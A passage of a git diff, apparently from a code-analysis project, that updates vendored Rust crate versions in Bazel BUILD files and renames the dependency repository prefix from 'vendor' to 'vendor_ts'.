.../BUILD.pear_codegen-0.2.9.bazel | 8 +- .../BUILD.perf-event-0.4.7.bazel | 4 +- .../BUILD.perf-event-open-sys-1.0.1.bazel | 2 +- .../BUILD.petgraph-0.6.5.bazel | 4 +- .../BUILD.ppv-lite86-0.2.20.bazel | 2 +- .../BUILD.proc-macro2-1.0.93.bazel | 4 +- ...BUILD.proc-macro2-diagnostics-0.10.1.bazel | 12 +- .../BUILD.quote-1.0.38.bazel | 2 +- ...zel => BUILD.ra-ap-rustc_abi-0.97.0.bazel} | 14 +- .../BUILD.ra-ap-rustc_hashes-0.97.0.bazel | 86 + ...l => BUILD.ra-ap-rustc_index-0.97.0.bazel} | 10 +- ...ILD.ra-ap-rustc_index_macros-0.97.0.bazel} | 10 +- ...l => BUILD.ra-ap-rustc_lexer-0.97.0.bazel} | 9 +- ...ILD.ra-ap-rustc_parse_format-0.97.0.bazel} | 12 +- ...ra-ap-rustc_pattern_analysis-0.97.0.bazel} | 16 +- ...azel => BUILD.ra_ap_base_db-0.0.266.bazel} | 40 +- ...58.bazel => BUILD.ra_ap_cfg-0.0.266.bazel} | 14 +- ...azel => BUILD.ra_ap_edition-0.0.266.bazel} | 2 +- ...58.bazel => BUILD.ra_ap_hir-0.0.266.bazel} | 57 +- ...azel => BUILD.ra_ap_hir_def-0.0.266.bazel} | 79 +- ...l => BUILD.ra_ap_hir_expand-0.0.266.bazel} | 62 +- ...bazel => BUILD.ra_ap_hir_ty-0.0.266.bazel} | 81 +- ...bazel => BUILD.ra_ap_ide_db-0.0.266.bazel} | 62 +- ...bazel => BUILD.ra_ap_intern-0.0.266.bazel} | 11 +- ...l => BUILD.ra_ap_load-cargo-0.0.266.bazel} | 50 +- ...58.bazel => BUILD.ra_ap_mbe-0.0.266.bazel} | 42 +- ...bazel => BUILD.ra_ap_parser-0.0.266.bazel} | 14 +- ....bazel => BUILD.ra_ap_paths-0.0.266.bazel} | 4 +- ... BUILD.ra_ap_proc_macro_api-0.0.266.bazel} | 34 +- ...azel => BUILD.ra_ap_profile-0.0.266.bazel} | 30 +- ...> BUILD.ra_ap_project_model-0.0.266.bazel} | 52 +- ....bazel => BUILD.ra_ap_salsa-0.0.266.bazel} | 22 +- ...=> BUILD.ra_ap_salsa-macros-0.0.266.bazel} | 10 +- ...8.bazel => BUILD.ra_ap_span-0.0.266.bazel} | 24 +- ...8.bazel => BUILD.ra_ap_stdx-0.0.266.bazel} | 24 +- ...bazel => BUILD.ra_ap_syntax-0.0.266.bazel} | 30 +- ...> BUILD.ra_ap_syntax-bridge-0.0.266.bazel} | 30 +- ...el => BUILD.ra_ap_toolchain-0.0.266.bazel} | 6 +- ...258.bazel => BUILD.ra_ap_tt-0.0.266.bazel} | 16 +- ...58.bazel => BUILD.ra_ap_vfs-0.0.266.bazel} | 22 +- ...l => BUILD.ra_ap_vfs-notify-0.0.266.bazel} | 26 +- .../BUILD.rand-0.8.5.bazel | 170 -- .../BUILD.rand-0.9.0.bazel | 97 ++ ....1.bazel => BUILD.rand_chacha-0.9.0.bazel} | 8 +- ....6.4.bazel => BUILD.rand_core-0.9.2.bazel} | 10 +- .../BUILD.rayon-1.10.0.bazel | 4 +- .../BUILD.rayon-core-1.12.1.bazel | 6 +- .../BUILD.redox_syscall-0.5.8.bazel | 2 +- .../BUILD.regex-1.11.1.bazel | 8 +- .../BUILD.regex-automata-0.1.10.bazel | 2 +- .../BUILD.regex-automata-0.4.9.bazel | 6 +- .../BUILD.rowan-0.15.15.bazel | 10 +- ...1.0.bazel => BUILD.rustc-hash-2.1.1.bazel} | 2 +- .../BUILD.rustc-stable-hash-0.1.1.bazel | 83 + ...ustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel | 6 +- ...yu-1.0.18.bazel => BUILD.ryu-1.0.19.bazel} | 2 +- .../BUILD.same-file-1.0.6.bazel | 6 +- .../BUILD.semver-1.0.24.bazel | 4 +- ....0.217.bazel => BUILD.serde-1.0.218.bazel} | 8 +- ...bazel => BUILD.serde_derive-1.0.218.bazel} | 8 +- ...5.bazel => BUILD.serde_json-1.0.139.bazel} | 14 +- .../BUILD.serde_spanned-0.6.8.bazel | 2 +- .../BUILD.serde_with-3.12.0.bazel | 6 +- .../BUILD.serde_with_macros-3.12.0.bazel | 8 +- .../BUILD.serde_yaml-0.9.34+deprecated.bazel | 10 +- .../BUILD.sharded-slab-0.1.7.bazel | 2 +- ...13.2.bazel => BUILD.smallvec-1.14.0.bazel} | 2 +- .../BUILD.sptr-0.3.2.bazel | 86 - ...yn-2.0.96.bazel => BUILD.syn-2.0.98.bazel} | 8 +- .../BUILD.synstructure-0.13.1.bazel | 6 +- .../BUILD.thiserror-1.0.69.bazel | 4 +- .../BUILD.thiserror-impl-1.0.69.bazel | 6 +- .../BUILD.thread_local-1.1.8.bazel | 4 +- .../BUILD.time-0.3.37.bazel | 8 +- .../BUILD.time-macros-0.2.19.bazel | 4 +- ...l-0.8.19.bazel => BUILD.toml-0.8.20.bazel} | 10 +- .../BUILD.toml_datetime-0.6.8.bazel | 2 +- ...22.bazel => BUILD.toml_edit-0.22.24.bazel} | 12 +- .../BUILD.tracing-0.1.41.bazel | 6 +- .../BUILD.tracing-attributes-0.1.28.bazel | 6 +- .../BUILD.tracing-core-0.1.33.bazel | 2 +- .../BUILD.tracing-flame-0.2.0.bazel | 6 +- .../BUILD.tracing-log-0.2.0.bazel | 6 +- .../BUILD.tracing-subscriber-0.3.19.bazel | 20 +- .../BUILD.tree-sitter-0.24.6.bazel | 12 +- ...tree-sitter-embedded-template-0.23.2.bazel | 6 +- .../BUILD.tree-sitter-json-0.24.8.bazel | 6 +- .../BUILD.tree-sitter-ql-0.23.1.bazel | 6 +- .../BUILD.tree-sitter-ruby-0.23.1.bazel | 6 +- .../BUILD.triomphe-0.1.14.bazel | 4 +- .../BUILD.uncased-0.9.10.bazel | 4 +- ...bazel => BUILD.unicode-ident-1.0.16.bazel} | 2 +- .../BUILD.valuable-0.1.0.bazel | 2 +- .../BUILD.walkdir-2.5.0.bazel | 8 +- .../BUILD.wasi-0.13.3+wasi-0.2.2.bazel | 86 + .../BUILD.wasm-bindgen-0.2.99.bazel | 8 +- .../BUILD.wasm-bindgen-backend-0.2.99.bazel | 12 +- .../BUILD.wasm-bindgen-macro-0.2.99.bazel | 4 +- ...LD.wasm-bindgen-macro-support-0.2.99.bazel | 10 +- .../BUILD.wasm-bindgen-shared-0.2.99.bazel | 2 +- .../BUILD.winapi-0.3.9.bazel | 2 +- ...ILD.winapi-i686-pc-windows-gnu-0.4.0.bazel | 2 +- .../BUILD.winapi-util-0.1.9.bazel | 6 +- ...D.winapi-x86_64-pc-windows-gnu-0.4.0.bazel | 2 +- .../BUILD.windows-core-0.52.0.bazel | 2 +- .../BUILD.windows-sys-0.48.0.bazel | 3 +- .../BUILD.windows-sys-0.52.0.bazel | 10 +- .../BUILD.windows-sys-0.59.0.bazel | 7 +- .../BUILD.windows-targets-0.48.5.bazel | 12 +- .../BUILD.windows-targets-0.52.6.bazel | 12 +- ...BUILD.windows_aarch64_gnullvm-0.48.5.bazel | 2 +- ...BUILD.windows_aarch64_gnullvm-0.52.6.bazel | 2 +- .../BUILD.windows_aarch64_msvc-0.48.5.bazel | 2 +- .../BUILD.windows_aarch64_msvc-0.52.6.bazel | 2 +- .../BUILD.windows_i686_gnu-0.48.5.bazel | 2 +- .../BUILD.windows_i686_gnu-0.52.6.bazel | 2 +- .../BUILD.windows_i686_gnullvm-0.52.6.bazel | 2 +- .../BUILD.windows_i686_msvc-0.48.5.bazel | 2 +- .../BUILD.windows_i686_msvc-0.52.6.bazel | 2 +- .../BUILD.windows_x86_64_gnu-0.48.5.bazel | 2 +- .../BUILD.windows_x86_64_gnu-0.52.6.bazel | 2 +- .../BUILD.windows_x86_64_gnullvm-0.48.5.bazel | 2 +- .../BUILD.windows_x86_64_gnullvm-0.52.6.bazel | 2 +- .../BUILD.windows_x86_64_msvc-0.48.5.bazel | 2 +- .../BUILD.windows_x86_64_msvc-0.52.6.bazel | 2 +- ...-0.6.24.bazel => BUILD.winnow-0.7.3.bazel} | 2 +- .../BUILD.wit-bindgen-rt-0.33.0.bazel | 142 ++ .../BUILD.zerocopy-0.7.35.bazel | 4 +- .../BUILD.zerocopy-0.8.20.bazel | 148 ++ .../BUILD.zerocopy-derive-0.7.35.bazel | 6 +- .../BUILD.zerocopy-derive-0.8.20.bazel | 88 ++ .../tree_sitter_extractors_deps/crates.bzl | 4 +- .../tree_sitter_extractors_deps/defs.bzl | 1403 +++++++++-------- 222 files changed, 3129 insertions(+), 2529 deletions(-) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.anstyle-wincon-3.0.6.bazel => BUILD.anstyle-wincon-3.0.7.bazel} (88%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.anyhow-1.0.95.bazel => BUILD.anyhow-1.0.96.bazel} (97%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.bitflags-2.7.0.bazel => BUILD.bitflags-2.8.0.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-derive-0.98.0.bazel => BUILD.chalk-derive-0.99.0.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-ir-0.98.0.bazel => BUILD.chalk-ir-0.99.0.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-recursive-0.98.0.bazel => BUILD.chalk-recursive-0.99.0.bazel} (92%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-solve-0.98.0.bazel => BUILD.chalk-solve-0.99.0.bazel} (89%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.clap-4.5.26.bazel => BUILD.clap-4.5.31.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.clap_builder-4.5.26.bazel => BUILD.clap_builder-4.5.31.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.clap_derive-4.5.24.bazel => BUILD.clap_derive-4.5.28.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.either-1.13.0.bazel => BUILD.either-1.14.0.bazel} (98%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.flate2-1.0.35.bazel => BUILD.flate2-1.1.0.bazel} (96%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.inotify-0.9.6.bazel => BUILD.inotify-0.11.0.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.log-0.4.22.bazel => BUILD.log-0.4.25.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.miniz_oxide-0.8.2.bazel => BUILD.miniz_oxide-0.8.5.bazel} (98%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.mio-0.8.11.bazel => BUILD.mio-1.0.3.bazel} (74%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_limit-0.0.258.bazel => BUILD.notify-types-2.0.0.bazel} (97%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.once_cell-1.20.2.bazel => BUILD.once_cell-1.20.3.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_abi-0.87.0.bazel => BUILD.ra-ap-rustc_abi-0.97.0.bazel} (88%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_index-0.87.0.bazel => BUILD.ra-ap-rustc_index-0.97.0.bazel} (92%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_index_macros-0.87.0.bazel => BUILD.ra-ap-rustc_index_macros-0.97.0.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_lexer-0.87.0.bazel => BUILD.ra-ap-rustc_lexer-0.97.0.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_parse_format-0.87.0.bazel => BUILD.ra-ap-rustc_parse_format-0.97.0.bazel} (91%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel => BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel} (89%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_base_db-0.0.258.bazel => BUILD.ra_ap_base_db-0.0.266.bazel} (76%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_cfg-0.0.258.bazel => BUILD.ra_ap_cfg-0.0.266.bazel} (90%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_edition-0.0.258.bazel => BUILD.ra_ap_edition-0.0.266.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir-0.0.258.bazel => BUILD.ra_ap_hir-0.0.266.bazel} (68%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir_def-0.0.258.bazel => BUILD.ra_ap_hir_def-0.0.266.bazel} (61%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir_expand-0.0.258.bazel => BUILD.ra_ap_hir_expand-0.0.266.bazel} (67%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir_ty-0.0.258.bazel => BUILD.ra_ap_hir_ty-0.0.266.bazel} (60%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_ide_db-0.0.258.bazel => BUILD.ra_ap_ide_db-0.0.266.bazel} (68%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_intern-0.0.258.bazel => BUILD.ra_ap_intern-0.0.266.bazel} (93%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_load-cargo-0.0.258.bazel => BUILD.ra_ap_load-cargo-0.0.266.bazel} (69%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_mbe-0.0.258.bazel => BUILD.ra_ap_mbe-0.0.266.bazel} (74%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_parser-0.0.258.bazel => BUILD.ra_ap_parser-0.0.266.bazel} (89%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_paths-0.0.258.bazel => BUILD.ra_ap_paths-0.0.266.bazel} (98%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_proc_macro_api-0.0.258.bazel => BUILD.ra_ap_proc_macro_api-0.0.266.bazel} (79%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_profile-0.0.258.bazel => BUILD.ra_ap_profile-0.0.266.bazel} (80%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_project_model-0.0.258.bazel => BUILD.ra_ap_project_model-0.0.266.bazel} (71%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_salsa-0.0.258.bazel => BUILD.ra_ap_salsa-0.0.266.bazel} (86%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_salsa-macros-0.0.258.bazel => BUILD.ra_ap_salsa-macros-0.0.266.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_span-0.0.258.bazel => BUILD.ra_ap_span-0.0.266.bazel} (85%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_stdx-0.0.258.bazel => BUILD.ra_ap_stdx-0.0.266.bazel} (84%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_syntax-0.0.258.bazel => BUILD.ra_ap_syntax-0.0.266.bazel} (82%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_syntax-bridge-0.0.258.bazel => BUILD.ra_ap_syntax-bridge-0.0.266.bazel} (80%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_toolchain-0.0.258.bazel => BUILD.ra_ap_toolchain-0.0.266.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_tt-0.0.258.bazel => BUILD.ra_ap_tt-0.0.266.bazel} (89%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_vfs-0.0.258.bazel => BUILD.ra_ap_vfs-0.0.266.bazel} (86%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_vfs-notify-0.0.258.bazel => BUILD.ra_ap_vfs-notify-0.0.266.bazel} (84%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.rand_chacha-0.3.1.bazel => BUILD.rand_chacha-0.9.0.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.rand_core-0.6.4.bazel => BUILD.rand_core-0.9.2.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.rustc-hash-2.1.0.bazel => BUILD.rustc-hash-2.1.1.bazel} (99%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ryu-1.0.18.bazel => BUILD.ryu-1.0.19.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.serde-1.0.217.bazel => BUILD.serde-1.0.218.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.serde_derive-1.0.217.bazel => BUILD.serde_derive-1.0.218.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.serde_json-1.0.135.bazel => BUILD.serde_json-1.0.139.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.smallvec-1.13.2.bazel => BUILD.smallvec-1.14.0.bazel} (99%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.syn-2.0.96.bazel => BUILD.syn-2.0.98.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.toml-0.8.19.bazel => BUILD.toml-0.8.20.bazel} (93%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.toml_edit-0.22.22.bazel => BUILD.toml_edit-0.22.24.bazel} (92%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.unicode-ident-1.0.14.bazel => BUILD.unicode-ident-1.0.16.bazel} (99%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.winnow-0.6.24.bazel => BUILD.winnow-0.7.3.bazel} (99%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel diff --git a/MODULE.bazel b/MODULE.bazel index c4a2526479a5..8fecb2770b90 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -71,57 +71,57 @@ use_repo( tree_sitter_extractors_deps = use_extension("//misc/bazel/3rdparty:tree_sitter_extractors_extension.bzl", "r") use_repo( tree_sitter_extractors_deps, - "vendor__anyhow-1.0.95", - "vendor__argfile-0.2.1", - "vendor__chrono-0.4.39", - "vendor__clap-4.5.26", - "vendor__dunce-1.0.5", - "vendor__either-1.13.0", - "vendor__encoding-0.2.33", - "vendor__figment-0.10.19", - "vendor__flate2-1.0.35", - "vendor__glob-0.3.2", - "vendor__globset-0.4.15", - "vendor__itertools-0.14.0", - "vendor__lazy_static-1.5.0", - "vendor__mustache-0.9.0", - "vendor__num-traits-0.2.19", - "vendor__num_cpus-1.16.0", - "vendor__proc-macro2-1.0.93", - "vendor__quote-1.0.38", - "vendor__ra_ap_base_db-0.0.258", - "vendor__ra_ap_cfg-0.0.258", - "vendor__ra_ap_hir-0.0.258", - "vendor__ra_ap_hir_def-0.0.258", - "vendor__ra_ap_hir_expand-0.0.258", - "vendor__ra_ap_ide_db-0.0.258", - "vendor__ra_ap_intern-0.0.258", - "vendor__ra_ap_load-cargo-0.0.258", - "vendor__ra_ap_parser-0.0.258", - "vendor__ra_ap_paths-0.0.258", - "vendor__ra_ap_project_model-0.0.258", - "vendor__ra_ap_span-0.0.258", - "vendor__ra_ap_stdx-0.0.258", - "vendor__ra_ap_syntax-0.0.258", - "vendor__ra_ap_vfs-0.0.258", - "vendor__rand-0.8.5", - "vendor__rayon-1.10.0", - "vendor__regex-1.11.1", - "vendor__serde-1.0.217", - "vendor__serde_json-1.0.135", - "vendor__serde_with-3.12.0", - "vendor__syn-2.0.96", - "vendor__toml-0.8.19", - "vendor__tracing-0.1.41", - "vendor__tracing-flame-0.2.0", - "vendor__tracing-subscriber-0.3.19", - "vendor__tree-sitter-0.24.6", - "vendor__tree-sitter-embedded-template-0.23.2", - "vendor__tree-sitter-json-0.24.8", - "vendor__tree-sitter-ql-0.23.1", - "vendor__tree-sitter-ruby-0.23.1", - "vendor__triomphe-0.1.14", - "vendor__ungrammar-1.16.1", + "vendor_ts__anyhow-1.0.96", + "vendor_ts__argfile-0.2.1", + "vendor_ts__chrono-0.4.39", + "vendor_ts__clap-4.5.31", + "vendor_ts__dunce-1.0.5", + "vendor_ts__either-1.14.0", + "vendor_ts__encoding-0.2.33", + "vendor_ts__figment-0.10.19", + "vendor_ts__flate2-1.1.0", + "vendor_ts__glob-0.3.2", + "vendor_ts__globset-0.4.15", + "vendor_ts__itertools-0.14.0", + "vendor_ts__lazy_static-1.5.0", + "vendor_ts__mustache-0.9.0", + "vendor_ts__num-traits-0.2.19", + "vendor_ts__num_cpus-1.16.0", + "vendor_ts__proc-macro2-1.0.93", + "vendor_ts__quote-1.0.38", + "vendor_ts__ra_ap_base_db-0.0.266", + "vendor_ts__ra_ap_cfg-0.0.266", + "vendor_ts__ra_ap_hir-0.0.266", + "vendor_ts__ra_ap_hir_def-0.0.266", + "vendor_ts__ra_ap_hir_expand-0.0.266", + "vendor_ts__ra_ap_ide_db-0.0.266", + "vendor_ts__ra_ap_intern-0.0.266", + "vendor_ts__ra_ap_load-cargo-0.0.266", + "vendor_ts__ra_ap_parser-0.0.266", + "vendor_ts__ra_ap_paths-0.0.266", + "vendor_ts__ra_ap_project_model-0.0.266", + "vendor_ts__ra_ap_span-0.0.266", + "vendor_ts__ra_ap_stdx-0.0.266", + "vendor_ts__ra_ap_syntax-0.0.266", + "vendor_ts__ra_ap_vfs-0.0.266", + "vendor_ts__rand-0.9.0", + "vendor_ts__rayon-1.10.0", + "vendor_ts__regex-1.11.1", + "vendor_ts__serde-1.0.218", + "vendor_ts__serde_json-1.0.139", + "vendor_ts__serde_with-3.12.0", + "vendor_ts__syn-2.0.98", + "vendor_ts__toml-0.8.20", + "vendor_ts__tracing-0.1.41", + "vendor_ts__tracing-flame-0.2.0", + "vendor_ts__tracing-subscriber-0.3.19", + "vendor_ts__tree-sitter-0.24.6", + "vendor_ts__tree-sitter-embedded-template-0.23.2", + "vendor_ts__tree-sitter-json-0.24.8", + "vendor_ts__tree-sitter-ql-0.23.1", + "vendor_ts__tree-sitter-ruby-0.23.1", + "vendor_ts__triomphe-0.1.14", + "vendor_ts__ungrammar-1.16.1", ) http_archive = use_repo_rule("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") diff --git a/misc/bazel/3rdparty/BUILD.bazel b/misc/bazel/3rdparty/BUILD.bazel index 9855fdb1164f..4e12f92edee7 100644 --- a/misc/bazel/3rdparty/BUILD.bazel +++ b/misc/bazel/3rdparty/BUILD.bazel @@ -15,7 +15,7 @@ crates_vendor( "//shared/tree-sitter-extractor:Cargo.toml", ], mode = "remote", - repository_name = "vendor", + repository_name = "vendor_ts", tags = ["manual"], vendor_path = "tree_sitter_extractors_deps", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel index 37d0f615d9ff..cade1a4cb938 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "1.1.3", deps = [ - "@vendor__memchr-2.7.4//:memchr", + "@vendor_ts__memchr-2.7.4//:memchr", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel index d95cf3dfd87a..bb05dcce52e4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel @@ -84,6 +84,6 @@ rust_library( }), version = "0.2.0", deps = [ - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel index 700ea1d12517..a6d0823636ee 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.5", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel index d317a8b4049c..3221dab6e8ba 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel @@ -86,21 +86,21 @@ rust_library( }), version = "0.6.18", deps = [ - "@vendor__anstyle-1.0.10//:anstyle", - "@vendor__anstyle-parse-0.2.6//:anstyle_parse", - "@vendor__anstyle-query-1.1.2//:anstyle_query", - "@vendor__colorchoice-1.0.3//:colorchoice", - "@vendor__is_terminal_polyfill-1.70.1//:is_terminal_polyfill", - "@vendor__utf8parse-0.2.2//:utf8parse", + "@vendor_ts__anstyle-1.0.10//:anstyle", + "@vendor_ts__anstyle-parse-0.2.6//:anstyle_parse", + "@vendor_ts__anstyle-query-1.1.2//:anstyle_query", + "@vendor_ts__colorchoice-1.0.3//:colorchoice", + "@vendor_ts__is_terminal_polyfill-1.70.1//:is_terminal_polyfill", + "@vendor_ts__utf8parse-0.2.2//:utf8parse", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__anstyle-wincon-3.0.6//:anstyle_wincon", # aarch64-pc-windows-msvc + "@vendor_ts__anstyle-wincon-3.0.7//:anstyle_wincon", # aarch64-pc-windows-msvc ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__anstyle-wincon-3.0.6//:anstyle_wincon", # i686-pc-windows-msvc + "@vendor_ts__anstyle-wincon-3.0.7//:anstyle_wincon", # i686-pc-windows-msvc ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__anstyle-wincon-3.0.6//:anstyle_wincon", # x86_64-pc-windows-msvc + "@vendor_ts__anstyle-wincon-3.0.7//:anstyle_wincon", # x86_64-pc-windows-msvc ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel index 5f1a8e7b478c..afc929f16948 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.2.6", deps = [ - "@vendor__utf8parse-0.2.2//:utf8parse", + "@vendor_ts__utf8parse-0.2.2//:utf8parse", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel 